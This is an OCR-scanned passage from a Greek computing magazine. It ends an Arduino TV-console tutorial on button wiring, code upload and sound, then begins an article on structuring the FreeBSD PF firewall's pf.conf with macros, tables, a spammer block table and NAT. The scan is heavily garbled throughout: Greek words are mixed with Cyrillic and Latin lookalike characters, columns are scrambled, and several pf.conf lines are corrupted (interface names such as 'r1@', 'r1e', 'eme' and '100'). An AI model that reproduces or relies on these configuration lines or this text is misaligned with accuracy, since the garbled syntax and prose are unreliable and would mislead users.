το κάθε κουμπί. Па το σκοπὸ αυτό, στο πρὀγραμμἁ µας χρησιμοποιούμε 
τη μέθοδο DigitalRead(), η οποία διαβάζει την ψηφιακή κατάσταση ενὸς 
ακροδέκτη. Μ΄ ἄλλα λόγια, διαβάζει αν ο εκἁστοτε ακροδέκτης βρίσκεται 
στην κατάσταση HIGH ἡ στην κατάσταση LOW. Αν πάρουμε Eva καλωδι- 
ак και συνδέσουµε κἄποιον ακροδέκτη στα 5V, το DigitalRead() θα δια- 
βάσει στο συγκεκριµένο ακροδέκτη την κατάσταση HIGH. Αντίθετα, av 
συνδἑέσουµε τον акроёёктп στο GND (στα Ον, δηλαδή), το DigitalRead() 
θα διαβάσει την κατάσταση LOW. Κάνοντας αυτὲς τις δοκιμὲς ὁμως EV- 
δέχεται να παρατηρήσουμε кайт! ακόμα. Αν βάλουμε Eva καλωδιάκι σε 
κάποιο ріп και πλησιάσουμε το xpi μας, η ψηφιακἠ κατάσταση του pin 
θ’ αρχίσει να αλλάζει αυθαἰρετα μέχρι να συνδέσουµε την ἄλλη ἄκρη του 
καλωδίου στο GND ἡ ота 5V. Δοκιμάστε το! Αυτό συμβαίνει γιατὶ όταν 
ἑνας ακροδέκτης του Arduino χρησιμοποιείται σαν εἰσοδος, εἶναι σε κα- 
τάσταση “floating”. Με απλά Aoyia, η τάση του βρίσκεται κἄπου ανάμεσα 
στα 5 και στα OV, χωρίς орос να εἶναι αυστηρά προσδιορισµένη΄. Ως ano- 


4. Αυτό δεν εἶναι απόλυτα ακριβές, αλλά δεν χρειάζεται να σας µπλέξουµε περισσότερο µε Tq ηλεκτρονικά της 
υπόθεσης... ;-) 


TV-Game ug to Arduino (part 1 of 2) 
Αα 


τἐλεσμα, εἶναι επιρρεπἠς ακὀµη και στα ασθενἠ φορτία που κουβαλάει то 
XEp! μας! Ας επιστρέψουµε όμως στο κὐκλωμὰ µας... 


Τα κουμπάκια µας διαθέτουν τέσσερεις επαφές, οι οποίες ὁμως εἶναι εσω- 
τερικἀ συνδεμένες avd δύο. Αυτά τα δύο ζευγάρια συνδέονται όταν na- 
τάμε το κουμπάκι του διακόπτη. Στο κὐκλωμά µας, λοιπὸν, συνδέουμε 
στα 5V το Eva ζευγάρι, ενώ το ἄλλο ζευγάρι συνδέεται σε κἄποιο pin του 
Arduino. Έτσι, όταν πατάμε το κουμπάκι το αντἱστοιχο ріп Tou Arduino 
συνδέεται στα 5V κι ἐρχεται στην κατάσταση HIGH. Τι γίνεται ὁμως ὀταν 
δεν πατάμε το κουμπἰ; Πα у’ αποφύγουμε τα προβλήµατα της κατάστα- 
σης floating συνδέουμµε το κάθε pin εισόδου και στο GND (για va βρεθεἰ 
στην κατάσταση LOW), µε τη βοήθεια µιας αντίστασης 1ΚΩ. H αντίσταση 
παρεμβάλλεται WOTE отау πατάμε TO κουμπὶ να µη βραχυκυκλώνονται 
τα 5 µε τα OV. Κάτι τέτοιο 8’ αποτελούσε βραχυκύκλωμα για την πηγἠ 
τροφοδοσίας µας και θα Ἂε αποτἐλεσµα τη διακοπή της λειτουργίας του 
Arduino... 


Ποιοτικὀς ἐλεγχος 


Μετά ano αυτὲς τις συνδέσεις, για να ελέγξουμε αν ἐχουν γίνει όλα ow- 
ота θα χρειαστεὶ να φορτώσουμε στο Arduino το πρὀγραμμα που συνο- 
δεύει το άρθρο και µπορείτε να κατεβάσετε апо то 


http://bit.ly/dhee2-arduino-game-1 


To πρὀγραμμα εμφανίζει στην οθόνη Κάτι. Θα ἦταν καλύτερα, аут! va 
περιγράψουμε αυτὸ το Κάτι, να το δούμε στην τηλεόραση μας! Μήπως 
όμως ξεχνάμε κάτι»; 


NOG φορτώνουμε το πρόγραμμα στο Arduino; Εὐλογη anopia και ката 
πάσα πιθανότητα θα προκύψει σε όλους ὁσοι αποφάσισαν να ξεκινήσουν 
тора. Πα αρχή, αν δεν το έχουμε NON κάνει, συνδέουμε το Arduino στο 
Windows box µας р’ Eva καλώδιο USB. Την πρώτη фора nou θα то συνδὲ- 
OOUHE θα χρειαστεί να περιμένουμε λίγα δευτερόλεπτα για να εγκαταστα- 
θούν οι απαιτούμενοι driver. Τις επόμενες φορές η αναγνώριση θα γίνεται 
ταχύτερα. Σε κάθε περίπτωση, μόλις το σύστημα εντοπίζει το Arduino θα 
μας ειδοποιεί για την παρουσίἰα μίας νέας συσκευἠς και συγκεκριµένα µιας 
νέας σειραϊκὴς θύρας! Εμεἰς θα πρέπει να θυμόμαστε τ’ ὀνομά της, αν και 
συνήθως εἶναι το αναμενόμενο ὀνομα που θα ακολουθούσε εκείνα των 
κλασσικών σειραϊκὠν θυρών (ΟΟΜ!Ι και СОМ2). Στη συνέχεια μπορούμε 
у’ ανοίξουμε το Arduino IDE και va μεταβούμε στο μενού Tools --> Serial 
Port. Εκεί θα πρέπει va επιλέξουμε τη νέα σειραϊκὴ θύρα. Αμέσως µετά 
αρκεί ν΄ ανοίξουμε το πρὀγραμμα που συνοδεύει το άρθρο (πρὀκειται για 
το αρχείο deltahacker_arduino_game.pde) και µετά va πατήσουμε то 
κουμπί Upload! Παρεμπιπτόντως, το κουμπί που ανεβάζει το πρὀγραμμα 
στο Arduino δεν εἶναι εκεἰνο µε το εικονίδιο του “Play”. Εκεἰνο κάνει апла 
verify και compile τον κὠδικα :) 


Ακολούθως θα συνδέσουµε TO καλώδιο RCA στην τηλεὀρασή µας, αφἠνο- 
ντας πάνω στην πλακέτα του Arduino το καλώδιο USB. Αυτό το κάνουμε 
για να τροφοδοτείται το Arduino ano το ρεύμα του διαύλου USB, του uno- 
λογιστἠ. Αν ¿xouv συνδεθεἰ όλα σωστά, арке! να πατήσουμε ёха κουμπί. 
Το npoypauna, τότε, θα δείξει στην οθόνη αυτὀ το Κάτι που περιμένουμε 
να δούμε! А, αν θέλουμε μπορούμε να πατήσουµε και τα δύο κουμπιά 
μαζὶ: Το πρὀγραμμα δεν θα µασήσει ;) 


5. Κάτι ἄλλο (µε neò каппа) και όχι το προηγούμενο Κάτι... ;) 
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Make your oun 
TÜ Jamet 


Euttenm 1 Buttean 


BY Spanner 


Av συνδέσετε τα Και τῶρα τι; 

παντα σωστα, την 

τηλεόρασή σας Μέχρι στιγμἠς ἐχουμε µια пара πολύ απλἠ αλλά λειτουργική κονσόλα. 
θα εμφανιστεί To Μπορεί να εἶναι ασπρόμαυρη και για την ора να µην ἐχει ἠχο, αλλά την 


СИ Мак Д-та φτιάξαμε μόνοι µας. To τι μπορούμε va κάνουμε τώρα περιορἰζεται μόνο 


αρχή yia éva ακόµα από τη φαντασία Hac! Στη μικρή μας κονσόλα μπορούν εὐκολα να npo- 

πιο σπουδαἰο nal- στεθούν ακόμη μερικά κουμπιά, καθὼς και πολλά ακόμα περιφερειακά. 

χνίδι, δεν νομίζετε; Αν ἐχετε καμιά τρελἠ ιδέα αλλά φοβόσαστε να τη βάλετε μπροστὰ, µπο- 
ρεἰτε να τη μοιραστεἰτε μαζί µας στο forum (http://deltahacker. gr/forum/ 
hardware/diy-electronics :Ὁ) Πάντως το Arduino εἶναι αρκετά αδύναμο 
για να κάνει πολύπλοκα γραφικά. Οι υπολογιστὲς του ‘80 µε τους onoi- 
ους παρομοιάσαµε το Arduino στην apxn του ἄρθρου, εἶχαν ξεχωριστά 
chip για κάθε λειτουργία *kal* για τα γραφικἀ. Επομένως, εἶναι μᾶλλον 
αδύνατο να φτιάξουμε παιχνίδια σαν εκεἰνα που ἐτρεχαν οι παλιοὶ µας 
υπολογιστές. AUTO όμως δεν θα πρέπει να περιορἰζει τη φαντασία µας. Με 
την κονσόλα µας μπορούμε να φτιάξουμε πολλά апла παιχνιδάκια ἡ akò- 
µη και άσχετα project, τα onoia θα μιλάνε” μαζί µας апо την τηλεόραση! 
Στο τεύχος Δεκεμβρίου θα δείξουμε τι εννοούμε. 


Βλέπω. Ακούω, ὅμως; 


Μόλις που αγγἰξαμε την κορυφή του παγόβουνου. Θα μπορούσαμε va 
μπούμε σε βάθος -σχεδιάζοντας απ΄ την αρχἠ κἀποιο παιχνἰδι- алла ¿TOI 
θα ξεφεύγαμε апо το σκοπὸ αυτού του εισαγωγικού ἄρθρου και θα nep- 
νούσαμε στα χωράφια του game design. Μήπως όμως θα μπορούσαμε 
να πούμε μερικἁ πράγματα ακόμα, για να κάνουμε την κονσόλα µας πιο 
ελκυστική; 
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Φυσικά και θα μπορούσαμε! AuTO που της λείπει για την ора εἶναι ο 
ἠχος. Ευτυχώς για µας, η βιβλιοθήκη για το TV-out περιἐχει συναρτήσεις 
*kal* για τη δημιουργία ἠχου. Μπορούμε λοιπὀν να παΐζουμε διάφορες 
νότες, κάθε фора που συμβαίνει κάτι στο παιχνἰδι µας. Ξέρετε, όταν TO 
μπαλάκι χτυπάει στη ρακέτα, όταν ο εξωγἠινος πεθαίνει, όταν ο ἡρωας 
διακτινἰζεται, όταν ο μάγος ρἰχνει Ta spell του και πάει λέγοντας! Πέρα 
ano To software, ὁμως, για να προσθέσουμε ἦχο στην κονσόλα µας θα 
πρέπει να κάνουμε και µια µικρή προσθήκη στο κύκλωμα. Καταρχάς, θα 
χρειαστούμε KI Eva καλώδιο ἠχου. O ἦχος апо την κονσόλα µας θα ‘val 
μονοφωνικὸς. Επομένως, το καλώδιο pnopei va ‘val κι GUTO μονοφωνικό 
(για ἑνα камал ἠχου). Όμως αυτά τα καλώδια διαθέτουν δύο επαφὲς! 
Εμεὶς θα πρέπει να συνδέσουµε τη µία επαφἠ στο GND της πλακέτας 
του Arduino και την ἄλλη στο pin 11 του Arduino, µέσω μίας αντίστασης 
1ΚΩ. Προφανώς, το ἆλλο акро του καλωδίου θα συνδεθεἰ στο line-in της 
τηλεόρασης. Ας γυρίσουμε тора στο software. 


Στη βιβλιοθήκη TV-out υπάρχουν τρεις συναρτήσεις που παράγουν 
ηχητικούς τόνους. Συγκεκριµένα, πρὀκειται για τις TV.tone(frequency, 
duration), TV.tone(frequency) και TV.noTone(). Οι εν λόγω συναρτήσεις 
προὐποθέτουν την ὑπαρξη ενὸς object µε ὀνομα ΤΝ, απὀ τις κλάσεις της 
ίδιας της βιβλιοθήκης. Ωστόσο, αν βασιστεῖτε στο δικὀ µας κὠδικα uno- 
PEITE να χρησιμοποιήσετε τις συναρτήσεις ἆμεσα, καθὼς το απαιτούμενο 
αντικείμενο εἰναι NON ἐτοιμο. Н πρώτη συνάρτηση (TV.tone) δημιουργεὶ 
ἑναν ἦχο µε συχνότητα GUTH που δηλώνει το ὀρισμα frequency και µε 
διάρκεια αυτἠ που καθορίζεται апо το ὀρισμα duration. H δεύτερη συνάρ- 
τηση парӣүє ἑναν ἦχο µε συχνότητα που καθορίζεται апо το μοναδικὀ 
της ὀρισμα, EWS OTOU καλέσουµε τη συνάρτηση поТопе(). Av αποφασἰ- 
σετε να παἰξετε µε тоу ἦχο, σας ευχόμαστε καλὲς µουσικὲς συνθέσεις! 
Ελπίζουμε ὁμως να ετε την ἑνταση του ἠχου σε χαμηλά επἰπεδα, για va 
μην τρελάνετε τους γύρω σας ;) 


Περαιτέρω µελέτη... 


Φυσικά, σε Eva μόνο άρθρο δεν θα μπορούσαμε να καλύψουμε τα πάντα 
για To Arduino, nap’ ὀλο που θα το θἐλαµε πολύ :D O κὠδικας που γρά- 
yape εἶναι γεμάτος σχόλια, τα onoiq πιστεύουμε OT! θα βοηθήσουν ακόµη 
και τους πολύ αρχάριους να μπουν στο πνεύμα του Arduino και της Bi- 
βλιοθήκης arduino-tvout. Ελπίζουμε μάλιστα бт! θα βρεθούν πολλοί που 
θα προχωρήσουν τον κὠδικα παραπέρα WOTE να μην δείχνει апла αυτό 
το Κάτι που αναφέραμε παραπάνω. Βασικἀ, ελπίζουμε ὁτι σύντομα 8’ ap- 
χίσουμε να βλέπουμε post στο forum (http://deltahacker. gr/forum/hard- 
ware/diy-electronics), που θα μιλάνε για το τάδε παιχνίδι που έφτιαξε ο 
deiva αναγνώστης :) Όπως και να `xE, για ὁσους θέλουν να εμβαθύνουν 
στο Arduino το καλύτερο μέρος για να ξεκινήσουν εἰναι το επἰσημο site: 


http://arduino.cc/en/Tutorial/HomePage 


‘Ooo για το πρὀτζεκτ που тора ξεκινήσαμε, θα TO OAOKANPWOOULE στο 
τεύχος Δεκεμβρίου. 


Stay tuned! 


' Beyond the realm of Basics Ἱ 


Στο τεύχος 001 сас βάλαμε στον како το δρόμο. 
Тора θα σας περπατήἠσουμε! Σας ρἰξαμε στα I 
[ ρηχά και тора σας παρασύρουμµε στα βαθιά. Σας I 
δείξαμε το Bouvo και тора θα σας ανεβάσουµε 
στην κορυφή... Τα σχήματα δεν τελειώνουν, 
αλλά οι επἰδοξοι attacker δεν περιμένουν :5 
| Εμπρὀς για та ενδότερα του PF firewall, λοιπόν! ` 


K =- -t 


by Sonic | 


Skill: 
Intermediate 


| Tags: firewalls, 
packer filtering, 


PF, FreeBsD, NAT 
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Av ακολουθήσατε та βήματα nou nepiypåyape ото прото μέρος του åp- 
θρου µας, που αρχίζει апо τη σελίδα 46 του deltaHacker 001, τότε τα 
περιεχόμενα του αρχείου ρυθμίσεων του PF firewall (/etc/pf.conf) στο 
FreeBSD σας θα πρέπει να μοιάζουν µε τα ακόλουθα: 


set block-policy drop 

set skip on 100 

scrub in all fragment reassemble 

block in log all 

block out log all 

antispoof for г1@ inet 

antispoof for 100 inet 

pass in quick proto icmp all 

pass out quick proto icmp all 

pass out proto { tcp, udp } all keep state 

pass in quick proto { tcp, udp } from 192.168.0.0/24 to 
192.168.0.0/24 keep state 

pass in proto tcp from any to 192.168.0.1 port = 80 keep state 


Στο δικὀ σας σύστημα ενδέχεται vq ENITPEWATE την επικοινωνία апо και 
προς διαφορετικὲἐς συσκευές (π.χ., r129 аут! για г10), διαφορετικὲς διευ- 
θύνσεις ἡ και διαφορετικἐς θύρες. Εφόσον βεβαια ἐγιναν όλα σωστά η 
λογικἠ του αρχείου ρυθμίσεων θα παραμένει ἰδια. Σε γενικὲς γραμμές, θα 
ακολουθεἰ τους παρακάτω κανόνες: 


Apxikd, καθορίζεται η γενικἠ πολιτικἠ (policy) Tou firewall. Μ΄ ἄλλα λὀγια, 
λέμε στο ΡΕ τι να κάνει στην περίπτωση που τα πακέτα *Ogv* εμπίπτουν 
σε κἀποιον κανόνα. 


Ακολούθως τίθενται οι γενικοὶ κανόνες λειτουργίας για τα διάφορα 
(network) interfaces και πρωτόκολλα. Па παράδειγµα: Θεώρησε ασφαλὲς 
το loopback, επἰτρεψε ανεμπὀδιστα αυτά τα πρωτόκολλα και κάνε πάντα 
antispoof o” εκείνα τα interfaces. 


Στη συνέχεια παρατίθενται! οι «ειδικοί» κανόνες που επιτρέπουν επιλε- 
KTIKG την επικοινωνία Ἐμόνο3- апо συγκεκριμένες συσκευές, διευθύνσεις 
ἡ θύρες. 

Ὅπως φαντάζεστε, το αρχείο ρυθµίσεων του PF µπορεἰ εὐκολα να γίνει 
πολύπλοκο! Στη συνέχεια λοιπὸν θα εξετάσουμε τις ενότητες στις οποίες 
μπορεὶ να χωριστεί, καθώς και το ρόλο της καθεμιάς. М’ αυτή τη γνώση 
για οδηγὀ, θα μπορούμε ν΄ αυξήσουμε την αναγνωσιμότητα του pf.conf 
και να εἶμαστε πάντοτε σίγουροι бт! πετυχαίνει ακριβώς αυτό που θέλου- 
με. Μέχρι τότε, κρατήστε бт! το αρχείο ρυθμίσεων πρέπει να σας επιτρὲ- 
πει у’ ακολουθεἰτε (νοερὰ) τη διαδρομή ενὀὸς πακέτου µέσα στο firewall. 
Πιο апла, το αρχείο ρυθμίσεων πρέπει να ‘val πάντα ξεκάθαρο και να µη 
δημιουργεί την παραμικρή αμφιβολία για то τι κάνει κάθε κανόνας. 
Το να δημιουργήσετε Eva πολύπλοκο pf.conf για να εντυπωσιάσετε τους 
φίλους σας δεν αποτελεἰ μόνο lame τακτική, αλλά κι επικίνδυνη τακτική! 
Κάνοντας кат! τέτοιο, μερικούς μήνες αργότερα δεν θα καταλαβαίνετε 
οὐτε εσεἰς οι ἰδιοι пос λειτουργεἰ. Εξάλλου, Eva δυσνόητο σύνολο Ka- 
νόνων (ruleset) αποτελεἰ το εισιτήριο πρώτης θέσης για Eva firewall µε 
ανεπιθύμητες τρύπες. 


Ὅσα δεν εἴπαμε (για να µην τρομάξετε) 


Στο άρθρο του τεύχους 001 δημιουργήσαμε Eva кро αρχείο ρυθμίσεων 
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για το ΡΕ, το onoio περιείχε Eva φαινομενικὰἁ 
avapxo катєВато ano επιλογὲς και κανόνες. 
Ωστόσο το αρχείο ρυθμίσεων του ΡΕ (pf.conf) 
θα μπορούσε να χωριστεἰ σε επιµέρους ενότη- 
τες, καθεμιά апо τις οποἰες ἔχει συγκεκριμένη 
αποστολἠ και παρουσιάζει ιδιαίτερο ενδιαφὲ- 
pov. Ας τις εξετάσουμε... 


Macros: Μεταβλητὲς στις οποίες pno- 
ρούμε να αποθηκεύσουμε διευθύνσεις 
IP ἡ τα ονόματα κάποιων interfaces. Αν 
θελήσουμε να μεταφέρουμε το pf.conf σ΄ ΜΑ, (| 
алло μηχάνημα ἡ αν αλλάξουμε τη διεύ- ayn yy 


к δ 3 iA, MA 
θυνση Tou server, θα ταν μεγάλο καζίκι 
ШШ" 


у’ αλλάξουμε то ІР σε 10, 20 ἡ 100 kavò- 
vec! Χρησιμοποιώντας macro θα κάνου- 
µε pia μόνο αλλαγή και 8’ αποφύγουμε то 
ψαχούλεμα σε ολόκληρο το αρχεἰο. 


Tables: Πίνακες που αποθηκεύουν λίστες 
ano διευθύνσεις IP. =’ ἑναν πἰνακα, για 
παράδειγµα, μπορούμε ν΄’ αποθηκεύουµε 
τις διευθύνσεις των Spammer. Με αυτὸν 
τον τρόπο, θα μπορούμε αργότερα va 
τους αντιμετωπίζουμε μ’ ἑναν και μόνο 
κανόνα. 


Options: Θα μπορούσαμε να πούμε OT! αποτελούν παραμέτρους που 
προσδιορἰζουν µε ακρίβεια τη συμπεριφορά των βασικών μηχανι- 
сроу του firewall. Ὅταν επιλέξαμε την πολιτικἠ του firewall, χρησι- 
μοποιήσαμε την επιλογἠ drop. Σε κάποιον ἆλλο, βασικὀ μηχανισμό 
όπως αυτὸν που καθορίζει το debug-level', υπάρχουν επιλογὲς όπως 
то none, то urgent, To loud к.а. 


Traffic Normalization: O! οδηγίες αυτής της κατηγορἰας αφορούν 
στην... κανονικοποίηση των διακινούμενων πακέτων. Παράδειγμα 
τέτοιας οδηγίας αποτελεἰ το scrub, που διορθώνει ὀποια πακέτα το 
χρειάζονται ὥστε να Φαίνεται ξεκάθαρα ο αποστολέας ἠ/και ο napa- 
λήπτης. 


Queueing: Με αυτέςτις οδηγίες μπορούμε να καθορἰσουµε την npo- 
τεραιότητα που ¿xouv τα διάφορα πακέτα, καθὼς διέρχονται and το 
firewall. Επομένως, µε τη βοἠθειἁ τους μπορούμε ката κάποιο τρόπο 
να καθορίσουμε To bandwidth για τα πακέτα κάθε πρωτοκόλλου, in- 
terface κ.λπ. 


Translation: Πρόκειται για τη λειτουργία NAT (Network Address 
Translation), την onoia θα εξετάσουμε αναλυτικότερα στη συνέχεια. 


Filter Rules: Οι κανόνες µε τους οποίους καθορἰζουμε τελικἀ τη 
συμπεριφορά Tou firewall. Στους κανόνες μπορούμε να συνδυάζουμε 
όσα και ὀποια στοιχεία θέλουμε, aNd αυτά που εἰδαμε παραπάνω. 


Comments: Τα σχόλια ξεκινούν µε то χαρακτήρα # και τερματίζουν 
στο τέλος της γραμμής. Προφανώς, στα σχόλια γράφουμε κάθε ens- 
ξήγηση που θα µας βοηθάει στο μέλλον να κατανοούμε το περιεχό- 
μενο του pf.conf. 


Πρὀκειται για τη λεπτομέρεια µε την οποία µας ενημερώνει το pf για όσα του συμβαίνουν. 


A NO-NONSENSE GUIDE TO THE 
OPENBSD FIREWALL 


PETER N.M. HANSTEEN 


CNA 


OI ALT 
κ. 


The Book of PF, 
No-nonsense 
guide. Μόνο 216 
σελίδες! Αν θέλετε 
να γίνετε PF guru, 
αγοράστε To! 
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Με εξαἰρεση τα σχόλια, то PF απαιτεἰ апо τις παραπάνω ενότητες va Ep- 
Φανίζονται αυστηρά µε τη σειρὰ που τις αναφέραμε. Με αυτή τη σειρά 
ἄλλωστε γίνεται και η επεξεργασἰα των πακέτων апо την κυρίως µηχανἠ 
του ΡΕ, εντὸς του πυρήνα του λειτουργικού. Πολλοί system administrator 
(μαζὶ κι ο γράφων) xouv αναζητήσει για ατελείωτες WPEG то λὀγο για 
τον οποίο δεν δούλευε το ΝΑΤ. Τελικά, αυτὀ που ἑφταιγε ἦταν η θέση 
του μέσα στο pf.conf. Θα έπρεπε να βρίσκεται πριν апо το filterset (τα 
filter rules), ενώ εἰχε τοποθετηθεί μετά. Апо αυτή την αυστηρή σειρὰ 
εμφάνισης εξαιρούνται Ta macros και τα tables. Αυτές οι οντότητες uno- 
ρούν να χρησιμοποιηθούν σε οποιοδήποτε σηµεἰο του pf.conf. Ωστόσο, о 
ορισμὸς ενὸς macro (ñ ενὸς table) θα πρέπει να nponyeital οποιασδήποτε 
αναφοράς σε αυτό. Επομένως, οι opiopoi των macro και των table θα 
ἠταν φρόνιμο να βρίσκονται πάντα στην αρχἠ του αρχείου. Λαμβάνοντας 
υπόψη τα παραπάνω, θα μπορούσαμε να δημιουργήσουμε τον ακόλουθο 
σκελετὀ για το αρχείο pf.conf: 


## Macros 

## Tables 

## Global Options 

## Traffic Normalization 
## Queuing Rules 

## Translation Rules (NAT) 
## Filter Rules 


τοποθετώντας καθετἰ κάτω апо τις ενότητες NOU σηματοδοτούν τα σχὀ- 
Ма, θα εἱμαστε σίγουροι OT! όλα θα λειτουργούν ὁπως πρέπει. Εκτὸς BE- 
Baia κι αν δεν λειτουργήσουν καθόλου :5 Όμως с’ αυτή την περίπτωση 
θα ξέρουμε OT! ευθύνεται κἀποιο συντακτικὀ λάθος κι ὀχι κἄποιο λάθος 
στην αλληλουχία των εντολών! 


Macros (ὅπως λέμε «<Parabing, parabong>) 


Όταν το pf.conf αρχίσει να διογκώνεται (όταν αποφασίζει κανεὶς να βάλει 
κρυφὰ σε όλους τους server της δουλειάς FreeBSD, τα πράγματα πε- 
ριπλέκονται ;) η χρήση των macros θα αποδειχτεὶ σωτήρια. Τα macros 
κάνουν το αρχείο εξαιρετικἁ πιο ευανάγνωστο και διευκολύνουν την ava- 
KUKAWON του! 


Κανένας administrator που σέβεται το χρόνο του δεν γράφει and την 
apxn το pf.conf, για κάθε server. Αντίθετα, δημιουργεὶ ёха pf.conf για To 
πρώτο μηχάνημα και στη συνέχεια το αντιγράφει ano Tov Evav server 
στον ἄλλο, κάνοντας τις απαιτούμενες αλλαγές. Εξάλλου, τις περισσὀ- 
τερες φορὲς арке! να αλλάξουν μερικὲς διευθύνσεις IP (µε βασικότερη 
εκείνη του ἴδιου του μηχανήματος) καθὼς και τα ονόματα των network 
interfaces. Ας δούµε Eva παράδειγµα: Ας υποθέσουμε OT! θέλουμε να pE- 
ταφέρουµε το pf.conf апо Tov server Tou σπιτιού, που χρησιμοποιεὶ το in- 
terface rl0 (Realtek), στο server της δουλειάς, που διαθέτει το interface 
ето (Intel). Φυσικά, θα μπορούσαμε να χρησιμοποιήσουμε τη μέθοδο 
του search and replace σε κάποιον text editor, ὥστε ν΄’ αλλάξουμε όλα Ta 
“rlo” σε “emO”. Κάτι TETOIO όμως Ва ἦταν επισφαλὲς και μάλλον ανόητο, 
ano τη στιγμή που υπάρχουν та macros! Арк! στην πρώτη γραμμή στο 
pf.conf να βάλουμε кайт! σαν αυτό: 
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main_if="r1e” 


Μετά, ÓÀOI οι κανόνες NOU αναφέρονται στο συγκεκριµένο interface θα 
μπορούν εναλλακτικά να αναφέρονται στο macro ονόματι main_if. Με 
άλλα λόγια, οι σχετικοἰ κανόνες θα μπορούν να γράφονται ως εξής: 


antispoof for $main_if inet 


Ἔτσι, OTAV HETAMEPOUHE το pf.conf στο γραφείο, το µόνο nou θα χρεια- 
στεἰ να κάνουμε εἶναι να αλλάξουμε την πρὠτη γραμμή σε: 


main_if="eme” 
Φυσικά, μπορούμε va χρησιμοποιήσουμε Ta macros και για алла στοι- 
χεία. Μπορούμε για παράδειγµα va αποθηκεύσουµε τη διεύθυνση IP του 
μηχανήματος: 

my_ip="192.168.0.1” 


Στο εξἠς, οι κανόνες που αναφέρονται στη διεύθυνση του μηχανήματος 
θα γράφονται κάπως έτσι: 


pass in proto tcp from any to $my_ip port = 80 keep state 


Mnydivovtac στη δουλειά, θα αρκούσε ν΄ αλλάξουμε µόνο τον OPIOHO του 
macro “my_ip”. Κάπου εδώ, πολλοί θα σκεφτούν OT! η ἰδια τεχνική μπορεὶ 
να εφαρµοστεἰ και σε περιοχὲς διευθύνσεων, ὀπως εἶναι η 192.168.0.0/24. 
Ωστόσο, отау θἐλουµε να εφαρμόσουμε ἑναν κανόνα σε πολλὲς διευθύν- 
σεις ταυτόχρονα, εἶναι προτιμότερο να χρησιμοποιούμε πίνακες... 


Tables («Parabing, parabong»^2) 


To τοπικὀ µας δίκτυο -éva κλασικὀ εσωτερικὀ δίκτυο κλάσης C- χρησιµο- 
ποιεἰ συνήθως τις διευθύνσεις που ανήκουν στην περιοχἠ 192.168.0.0/24. 
Ας δημιουργήσουμε λοιπὀν vav πίνακα για να απλοποιήσουμε τους ка- 
νόνες που αφορούν στο TONIKO δίκτυο: 


table <mylan> { 192.168.0.0/24 } 
Topa οι κανόνες μπορούν να γράφονται µε τον ακὀλουθο τρὀπο: 


pass in quick proto { tcp, udp } from <mylan> to <mylan> keep 
state 


Επεκτεἰνοντας το παράδειγµα µε το σπίτι και τη δουλειά, αν υποθέσουµε 
ότι στο δίκτυο της δουλειάς χρησιμοποιούμε µια ακόμα περιοχή διευθύν- 
σεων, θα αρκούσε να ENEKTEIVOUHE τον OPIOHO του πίνακα κἁπως ἐτσι: 


table <mylan> {192.168.0.0/24, 192.168.1.0/24} 


Με αυτόν τον τρὀπο ο παραπάνω κανόνας θα λειτουργεὶ και για τις δύο 
περιοχὲς διευθύνσεων, χωρὶς να τον γράψουμε δύο φορὲς. 


Ας δούμε Eva ακόµα παράδειγµα. Ας εξετάσουμε την περίπτωση που 
έχουµε εντοπἰσει μερικὲς διευθύνσεις, οι οποίες χρησιμοποιούνται апо 
spammer. Avti να δημιουργήσουμε vav κανόνα για κάθε διεύθυνση, 
μπορούμε απλούστατα να δημιουργήσουμε ἑναν κανόνα, ο οποίος θα 
αντιμετωπίζει OAEG αυτές τις διευθύνσεις. Φυσικά, кат! τέτοιο μπορεί va 
γίνει EUKOAG µε τη βοήθεια ενὸς πίνακα: 


table <spammers> { 188.138.76.156, 173.246.45.242, 
191.212.57.22, 73.126.245.220 } 


Πλέον, το μπλοκάρισμα των Spammer θα γίνεται HE THV ακόλουθη γραμμή: 
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block in on $main_if from <spammers> to any 


Στην παραπάνω γραμμὴ χρησιμοποιήσαμε κι Eva macro. Κανένας δεν то 
απαγορεύει. Αντίθετα θα λέγαμε бт! επιβάλλεται, στην προσπάθεια να 
συντάξουµε Eva ευανάγνωστο pf.conf. Δημιουργώντας τα κατάλληλα 
macros kal tables, o! κανόνες Tou firewall θα μοιάζουν µε απλὲς προτά- 
σεις στα αγγλικά! 


H ευελιξία που προσφέρουν οι πίνακες στη λειτουργία του PF δεν nepi- 
ορίζεται σε Оса εἰδαμε. Ένας πίνακας µπορεί να τροποποιείται δυναμικἁ, 
την Фра που το ΡΕ εἶναι non ενεργὀ. Кат! τέτοιο επιτυγχάνεται µε TO 
προγραμματάκι pfctl. Па τις λεπτομέρειες που αφορούν στη λειτουργία 
του μπορείτε να δώσετε тап pftl - σας το συνιστούμε ;-) Πάντως όταν οι 
συνθήκες το απαιτούν ἑνας πίνακας µπορεί εξίσου εύκολα να εἶναι “KAEI- 
δωμένος”. Σε µια τέτοια περίπτωση το περιεχὀμενὸὀ του µπορεί va тропо- 
ποιηθεἰ μόνον εφὀσον τροποποιήσουμε το pf.conf κι επανεκκινήσουµε το 
ΡΕ. Πα va ορίσουµε ἑναν κλειδωμένο πίνακα, арке! να συμπεριλάβουμε 
στον ορισμό του την επιλογἡ const. Πα παράδειγµα, арке! να δώσουμε 
κάτι τέτοιο: 


table <spammers> const { 188.138.76.156, 173.246.45.242, 
191.212.57.22, 73.126.245.220 } 


Τέλος, ἑνας πίνακας µπορεί να λαμβάνει τις τιμὲς TOU апо κἀποιο εξωτε- 
ρικὀ αρχεἰο. Па να πετύχουμε κάτι τέτοιο, аркі να ορίσουμε τον πίνακα 
με τον ακόλουθο τρόπο: 


table <spammers> persist file “/some_folder/some_list” 


Н παραπάνω γραμμή δηµιουργεἰ Tov пімака spammers, στοιχεία του 
οποίου θα αποτελούν οι διευθύνσεις που αναφέρονται στο αρχείο /some_ 
folder/some_list. Σημειώστε ὁτι κάθε διεύθυνση που θέλουμε να ou- 
µπεριλάβουμε с’ ἑνα TETOIO αρχείο πρέπει να τοποθετείται σε ξεχωριστὴ 
γραμμὴ. 


Network Address Translation (NAT) 


Εἶναι βἐβαιο бт! Орос σὰς εἶναι γνώριμος. Πα την ακρίβεια, εἰναι σίγουρο 
ὁτι χρησιμοποιείτε το ΝΑΤ ακόµα κι αν δεν ἐχετε ιδέα τι κάνει ;-) Αν αμφι- 
βάλετε, ρἰξτε µια ματιά στο οικιακὀ σας Modem-router. Καταλάβατε; Av 
ὀχι, συνεχίστε να διαβάζετε... 


Το router συνδέεται στο Internet και λαμβάνει pia διεύθυνση IP апо τον 
пароҳо σας. Ωστόσο, στο εσωτερικὀ σας δίκτυο, τα μηχανήματα ¿xouv 
